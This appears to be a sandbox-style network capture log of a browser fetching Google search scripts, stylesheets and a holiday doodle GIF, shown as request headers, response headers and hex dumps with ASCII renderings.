2024-12-04 11:20:13 UTC	1390	IN	Data Raw: 74 69 6f 6e 2c 77 61 3d 22 61 66 74 20 61 66 74 69 20 61 66 74 72 20 61 66 74 73 20 63 62 73 20 63 62 74 20 66 68 74 20 66 72 74 73 20 66 72 76 74 20 68 63 74 20 68 73 74 20 70 72 74 20 70 72 73 20 73 63 74 22 2e 73 70 6c 69 74 28 22 20 22 29 3b 66 75 6e 63 74 69 6f 6e 20 53 28 61 29 7b 72 65 74 75 72 6e 28 61 3d 76 61 2e 73 65 61 72 63 68 2e 6d 61 74 63 68 28 6e 65 77 20 52 65 67 45 78 70 28 22 5b 3f 26 5d 22 2b 61 2b 22 3d 28 5c 5c 64 2b 29 22 29 29 29 3f 4e 75 6d 62 65 72 28 61 5b 31 5d 29 3a 2d 31 7d 0a 66 75 6e 63 74 69 6f 6e 20 54 28 61 29 7b 76 61 72 20 62 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2c 63 3d 62 2e 6d 3b 69 66 28 21 63 7c 7c 21 63 2e 70 72 73 29 7b 63 3d 77 69 6e 64 6f 77 2e 5f 63 73 63 3d 3d 3d 22 61 67 73 61 22 26 26 Data Ascii: tion,wa="aft afti aftr afts cbs cbt fht frts frvt hct hst prt prs sct".split(" ");function S(a){return(a=va.search.match(new RegExp("[?&]"+a+"=(\\d+)")))?Number(a[1]):-1}function T(a){var b=google.timers.load,c=b.m;if(!c\|\|!c.prs){c=window._csc==="agsa"&&
2024-12-04 11:20:13 UTC	1390	IN	Data Raw: 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 67 3d 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 68 7c 7c 6b 21 3d 3d 6d 7c 7c 63 28 66 2c 6e 2c 67 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 6c 2c 71 29 7b 6c 3d 4d 61 74 68 2e 6d 61 78 28 66 2c 6c 29 3b 66 21 3d 3d 6c 26 26 28 6e 3d 66 2c 67 3d 71 29 3b 66 3d 6c 3b 2b 2b 6d 3b 64 28 29 7d 76 61 72 20 68 3d 21 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 30 2c 66 3d 30 2c 67 3b 49 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 61 28 6c 29 26 26 28 2b 2b 6b 2c 6c 2e 69 7c 7c 6c 2e 41 3f 65 28 6c 2e 69 7c 7c 30 2c 6c 2e 67 29 3a 6c 2e 76 2e 70 75 73 68 28 65 29 29 7d 29 3b 62 28 29 3b 68 3d 21 31 3b 64 28 29 7d 3b 76 61 72 20 57 3d 21 31 2c 58 3d 30 2c 59 Data Ascii: w function(){this.g=null};function V(a,b,c){function d(){h\|\|k!==m\|\|c(f,n,g)}function e(l,q){l=Math.max(f,l);f!==l&&(n=f,g=q);f=l;++m;d()}var h=!0,k=0,m=0,n=0,f=0,g;I(function(l){a(l)&&(++k,l.i\|\|l.A?e(l.i\|\|0,l.g):l.v.push(e))});b();h=!1;d()};var W=!1,X=0,Y
2024-12-04 11:20:13 UTC	1390	IN	Data Raw: 66 28 43 61 3e 30 29 61 3a 7b 69 66 28 74 21 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 44 61 3d 75 28 29 2c 45 61 3d 43 61 2d 44 61 3b 69 66 28 45 61 3e 30 29 7b 5a 3d 73 65 74 54 69 6d 65 6f 75 74 28 55 2c 45 61 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2b 44 61 29 29 3b 62 72 65 61 6b 20 61 7d 55 28 29 7d 5a 3d 76 6f 69 64 20 30 7d 67 6f 6f 67 6c 65 2e 63 2e 6d 61 66 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 78 7c 7c 49 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 57 7c 7c 28 67 6f 6f 67 6c 65 2e 63 2e 62 28 22 61 66 74 22 29 2c 57 3d 21 30 29 3b 59 7c 7c 7a 61 28 61 2c 62 29 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 6d 69 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 64 29 7b 76 61 72 20 65 3d 45 28 64 29 3b 64 2e 67 2e 73 65 Data Ascii: f(Ca>0)a:{if(t!==void 0){var Da=u(),Ea=Ca-Da;if(Ea>0){Z=setTimeout(U,Ea,Math.floor(t+Da));break a}U()}Z=void 0}google.c.maft=function(a,b){x\|\|I(function(){});W\|\|(google.c.b("aft"),W=!0);Y\|\|za(a,b)};google.c.miml=function(a){function b(d){var e=E(d);d.g.se

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:15 UTC	1728	OUT	GET /xjs/_/ss/k=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAAAYAGAXIEAAAAAAAAwAQBBAAAQACAEEEACsAAAAAgCgDACAAgAEABQAAAACowAQQEAOACUACR2AAFAgAAABAAHAADJoCEQFIAoAAAAAAAAAAAIAAACGABAIANABEAAGgEgAAEQPAgAAAAAIAgAwEwCGgAEIAAAAAAAAIAMAAAAYUkAAAAAAAAAAAAAAAAAAgCAYCgAoCAAAAAAAAAAAAAAAAAAAAIEmCA/d=1/ed=1/br=1/rs=ACT90oFG6YoYHEZhg5Ki528uVBEREMKmXQ/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:16 UTC	809	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/css; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 7763 Date: Wed, 04 Dec 2024 11:20:16 GMT Expires: Thu, 04 Dec 2025 11:20:16 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Tue, 03 Dec 2024 22:30:27 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 11:20:16 UTC	581	IN	Data Raw: 3a 72 6f 6f 74 7b 2d 2d 43 4f 45 6d 59 3a 23 31 66 31 66 31 66 3b 2d 2d 78 68 55 47 77 63 3a 23 66 66 66 7d 3a 72 6f 6f 74 7b 2d 2d 76 5a 65 30 6a 62 3a 23 61 38 63 37 66 61 3b 2d 2d 6e 77 58 6f 62 62 3a 23 36 33 38 65 64 34 3b 2d 2d 56 75 5a 58 42 64 3a 23 30 30 31 64 33 35 3b 2d 2d 75 4c 7a 33 37 63 3a 23 35 34 35 64 37 65 3b 2d 2d 6a 49 4e 75 36 63 3a 23 30 30 31 64 33 35 3b 2d 2d 54 79 56 59 6c 64 3a 23 30 62 35 37 64 30 3b 2d 2d 5a 45 70 50 6d 64 3a 23 63 33 64 39 66 62 3b 2d 2d 51 57 61 61 61 66 3a 23 36 33 38 65 64 34 3b 2d 2d 44 45 65 53 74 66 3a 23 66 35 66 38 66 66 3b 2d 2d 54 53 57 5a 49 62 3a 23 65 35 65 64 66 66 3b 2d 2d 42 52 4c 77 45 3a 23 64 33 65 33 66 64 3b 2d 2d 67 53 35 6a 58 62 3a 23 64 61 64 63 65 30 3b 2d 2d 41 71 6e 37 78 64 3a 23 Data Ascii: :root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 7d 2e 41 42 4d 46 5a 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 31 30 30 6d 73 2c 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 32 35 30 6d 73 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 69 6e 73 65 74 3a 30 7d 2e 6a 62 42 49 74 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 44 55 30 4e 4a 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 6c 50 33 4a 6f 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6e 4e 4d 75 4f 64 7b 61 6e Data Ascii: }.ABMFZ{transition:background-color 100ms,visibility 0s 250ms;position:fixed;visibility:hidden;inset:0}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{an
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 7d 36 32 2e 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 36 37 35 64 65 67 29 7d 37 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 38 31 30 64 65 67 29 7d 38 37 2e 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 34 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 74 75 72 6e 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 62 6c 75 65 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 32 35 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 32 36 25 7b 6f 70 61 63 69 74 79 3a 30 7d 38 39 25 7b 6f 70 61 63 69 74 79 3a 30 7d 39 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 31 Data Ascii: ansform:rotate(540deg)}62.5%{transform:rotate(675deg)}75%{transform:rotate(810deg)}87.5%{transform:rotate(945deg)}100%{transform:rotate(3turn)}}@keyframes qli-blue-fade-in-out{0%{opacity:0.99}25%{opacity:0.99}26%{opacity:0}89%{opacity:0}90%{opacity:0.99}1
2024-12-04 11:20:16 UTC	735	IN	Data Raw: 62 20 2e 74 53 33 50 35 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 47 67 54 4a 57 65 20 2e 6e 4e 4d 75 4f 64 20 2e 4a 37 75 75 55 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 6c 65 66 74 2d 73 70 69 6e 20 31 33 33 33 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 47 67 54 4a 57 65 20 2e 6e 4e 4d 75 4f 64 20 2e 73 44 50 49 43 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 20 31 33 33 33 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 42 53 6e 4c 62 20 2e 6e 4e 4d 75 4f 64 20 2e 4a 37 75 75 55 65 7b 61 Data Ascii: b .tS3P5{border-bottom-color:transparent}.GgTJWe .nNMuOd .J7uuUe{animation:qli-left-spin 1333ms cubic-bezier(0.4,0,0.2,1) infinite both}.GgTJWe .nNMuOd .sDPIC{animation:qli-right-spin 1333ms cubic-bezier(0.4,0,0.2,1) infinite both}.BSnLb .nNMuOd .J7uuUe{a
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 7d 2e 56 44 67 56 69 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 79 55 54 4d 6a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 7a 4a 55 75 71 66 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 2e 41 42 34 57 66 66 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 70 78 7d 2e 4f 68 53 63 69 Data Ascii: keyframes qli-right-spin{0%{transform:rotate(-130deg)}50%{transform:rotate(5deg)}100%{transform:rotate(-130deg)}}.VDgVie{text-align:center}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhSci
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 6f 74 68 7d 2e 54 78 6e 67 6e 62 2e 54 78 6e 67 6e 62 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 7d 2e 54 78 6e 67 6e 62 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 31 34 70 78 20 30 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 38 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 36 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 68 65 69 67 68 74 3a 35 36 39 70 78 29 7b 2e 4c 48 33 77 47 2c 2e 6a 68 5a 76 6f 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 57 75 30 76 39 62 2c 2e 79 4b 36 6a 71 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 Data Ascii: oth}.Txngnb.Txngnb{line-height:20px}.Txngnb{color:#fff;flex:1 1 auto;margin:14px 0;word-break:break-word}.sHFNYd{margin-right:-8px}@media (min-width:569px) and (min-height:569px){.LH3wG,.jhZvod{text-align:center}.Wu0v9b,.yK6jqe{display:inline-block;max-wi
2024-12-04 11:20:16 UTC	887	IN	Data Raw: 72 3d 72 74 6c 5d 20 2e 74 59 6d 66 78 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 32 2e 35 70 78 2c 31 2e 38 70 78 29 20 72 6f 74 61 74 65 5a 28 34 35 64 65 67 29 7d 2e 49 42 50 5a 75 2e 74 59 6d 66 78 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 32 2e 35 70 78 2c 2d 35 2e 37 70 78 29 20 72 6f 74 61 74 65 5a 28 34 35 64 65 67 29 7d 5b 64 69 72 3d 72 74 6c 5d 20 2e 49 42 50 5a 75 2e 74 59 6d 66 78 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 32 2e 35 70 78 2c 2d 35 2e 37 70 78 29 20 72 6f 74 61 74 65 5a 28 34 35 64 65 67 29 7d 2e 6f 51 63 50 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 Data Ascii: r=rtl] .tYmfxe{transform:translate(-2.5px,1.8px) rotateZ(45deg)}.IBPZu.tYmfxe{transform:translate(2.5px,-5.7px) rotateZ(45deg)}[dir=rtl] .IBPZu.tYmfxe{transform:translate(-2.5px,-5.7px) rotateZ(45deg)}.oQcPt{border-bottom:none;border-left:1px solid rgba(0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:15 UTC	1395	OUT	GET /logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:16 UTC	660	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 87886 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sat, 30 Nov 2024 13:23:23 GMT Expires: Sun, 30 Nov 2025 13:23:23 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 25 Nov 2024 19:22:10 GMT Content-Type: image/gif Age: 338213 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 11:20:16 UTC	730	IN	Data Raw: 47 49 46 38 39 61 f4 01 c8 00 f7 ff 00 b5 ff f8 8d b8 fe 14 4e f2 ff bb 01 1d 1a 1b fe fc b1 98 5b 99 8d 8f 8e fd 9a 47 fe f3 4e 9f f6 ad 70 70 70 98 96 5a fd ba b8 02 fd ce ff cd 0b 06 d8 a6 00 ac 44 76 93 ff 9a 5c 68 4b 98 ff ff 54 48 ee 71 d7 01 f6 fd 6c ae fe 4b 4b 4a 6d 9a 8f fe fa 6d fd f7 92 ff 48 b1 48 ad f3 9f 92 24 fd 90 8c 92 fe f6 f3 96 fc 0f dd 4a 00 d7 f0 f6 b3 f9 ff 71 6d dd 8e fc d0 dd fe 9e 1a 19 e3 33 62 5f 55 14 fe db 50 5c 14 11 5d 20 4e 5b 6c a1 1f 48 63 fd b6 d5 fe 47 8b 53 9a 6e 23 5d a1 41 f6 5c 11 1d 5c fb 71 b8 d0 d1 b1 fc 44 3a 15 d3 24 fd 8d da 08 27 e4 a0 2e 53 97 cc fe 33 ab ef 72 fd f7 50 68 f2 fd dc 6c 07 64 29 fc 8e b6 ae d2 ca b2 fb cf cc ff da 2a ff d1 0a bd 8c 14 2a a0 d8 b8 b7 24 ba 68 92 ab ae 84 71 11 4c fc d6 b2 8f Data Ascii: GIF89aN[GNpppZDv\hKTHqlKKJmmHH$Jqm3b_UP\] N[lHcGSn#]A\\qD:$'.S3rPhld)**$hqL
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: ee dd ca 54 ff 7b c2 dd c9 e8 ff c9 ee dd 1e bd 9b 03 33 99 ee bb ca e3 eb 22 37 ef 33 78 ff 99 33 cc cc e1 ee cc dd ff 22 47 ee dd 43 22 99 ff ff ff ff 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 08 00 ff 00 2c 00 00 00 00 f4 01 c8 00 00 08 ff 00 19 09 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 6a dc c8 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b b7 ae dd bb 78 f3 ea dd cb b7 af df bf 80 03 0b 1e 4c b8 b0 e1 c3 88 13 2b 5e cc b8 b1 e3 c7 90 23 4b Data Ascii: T{3"73x3"GC"!NETSCAPE2.0!,H\#JH3j CI(S\0cI8s@JH]PJJXj`Kh]pKxL+^#K
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 42 a0 11 fb 40 b3 4c df 62 64 06 23 57 cd 2b 7c 81 92 96 ec a6 37 07 22 8b 05 d0 41 9e 04 91 85 2f 72 f1 4a 85 94 13 9d e7 54 27 3b 07 02 87 03 50 83 1a aa f0 65 43 86 71 8b 59 de f3 a6 6a c4 00 0a 20 32 0c 3a 8c 33 23 07 dc 85 31 8f 19 88 38 24 b3 81 0a ad c2 12 29 12 29 b7 89 01 04 18 b4 a6 ed b2 a9 cd 73 39 cc 9b a9 50 c5 40 9a 70 00 5f 30 4f 16 b2 b0 05 2e 16 00 87 3b 32 e4 a4 28 8d 80 4a 57 ca 88 5c 64 c0 17 62 7d 2b 43 76 01 43 9c da 55 8d 14 d0 85 4b 50 10 84 66 84 c0 a0 44 45 68 32 ad 20 80 2c b0 22 23 4d 9d 05 25 9e ba 48 29 06 ed 15 a7 b0 e8 45 2b 79 55 ac 12 c4 16 19 f8 86 3e 16 70 00 b2 6a 20 1c 0b f8 e7 59 d3 9a ce 92 ae f4 00 19 58 40 06 9a 87 10 14 d8 f4 ae b0 9d a1 0f 96 6a 12 d4 ff ed 62 11 44 3d e8 51 2f f0 40 12 c0 02 b1 6d 83 82 18 00 Data Ascii: B@Lbd#W+\|7"A/rJT';PeCqYj 2:3#18$))s9P@p_0O.;2(JW\db}+CvCUKPfDEh2 ,"#M%H)E+yU>pj YX@jbD=Q/@m
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 09 f6 86 5a ea b6 11 c3 20 8b b3 38 8b 0a 45 48 dd 40 7a 7c a8 8b ff 01 05 04 00 05 3b 92 7f 22 17 12 6d f7 88 69 95 8c 95 b8 00 06 02 82 da a8 8d 6c 98 10 48 f7 8d a7 28 43 18 c0 74 26 c1 0c 92 20 09 2e c0 09 22 e0 0a 74 90 01 8b 58 46 ed b8 91 c8 03 09 3f d0 07 e2 60 83 1a c1 7e db e3 05 04 30 0d 05 49 42 23 d1 76 03 f8 8f 1d 78 65 fc 91 8d 29 59 90 0d a1 0b 1e a0 90 a8 ff 38 8e e5 e8 02 92 20 02 8c 80 59 9f 78 11 cd b0 91 b3 78 0b b0 00 00 21 89 12 ec 87 0d 18 87 92 05 69 84 21 71 91 be e0 7b a4 c5 04 fd 97 8e e3 71 1e 0a 72 21 5e f2 1f 0b 11 00 df 78 93 da f7 12 10 29 91 85 b0 05 45 b7 73 20 21 01 44 19 04 2e a1 55 ee d1 76 e2 f4 94 25 01 07 a9 55 6e a4 15 7c d6 97 1e e6 81 1f 5c 69 21 69 22 8a 09 b1 0b 37 f9 03 62 39 43 a9 d8 12 cc b0 78 a1 05 07 70 Data Ascii: Z 8EH@z\|;"milH(Ct& ."tXF?`~0IB#vxe)Y8 Yxx!i!q{qr!^x)Es !D.Uv%Un\|\i!i"7b9Cxp
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: bb c2 50 40 09 19 03 0e 91 70 28 8a 46 34 37 ff 8c 76 f6 a1 c3 ef 6b 98 1e 10 43 f7 fb 10 40 1c c4 34 24 8e 05 d1 0a 7d dc a6 39 90 28 71 9b 0a 2f 62 00 04 90 09 50 dc 01 c4 90 10 d6 50 c5 6f 60 0d fb d9 59 0e 58 a4 5f ec ae f1 fa 93 51 2a 10 a7 43 b4 d1 9b 4f 28 b0 54 bb 30 70 38 05 c7 02 21 c7 6a c5 77 9e c6 08 f9 8b c7 9e cc ab d7 5a c4 8c 64 02 27 3c b1 79 6a 25 50 30 06 19 93 03 e4 72 03 43 46 49 5f f3 b9 8c 66 1f ed f0 be e0 fc be 31 e4 c3 70 64 c9 69 64 b6 03 81 ad 0c 6b 02 b3 c0 bb 04 91 01 76 50 ca 01 cc bb aa 70 ae 31 2b 04 62 7c 10 70 20 90 e5 fa bb ed b9 c0 7e 3b 10 08 eb bc f8 1a bd ed 55 ad 05 b1 0b 91 77 4f c0 cc 08 33 40 5a 6a b5 0c 02 e1 98 8c e0 c1 eb 0c b1 08 92 b6 be 5a 0b 26 9c 86 d0 9c b9 d3 1c a3 d7 7c 03 24 4d 49 37 a0 c7 60 3b 42 Data Ascii: P@p(F47vkC@4$}9(q/bPPo`YX_Q*CO(T0p8!jwZd'<yj%P0rCFI_f1pdidkvPp1+b\|p ~;UwO3@ZjZ&\|$MI7`;B
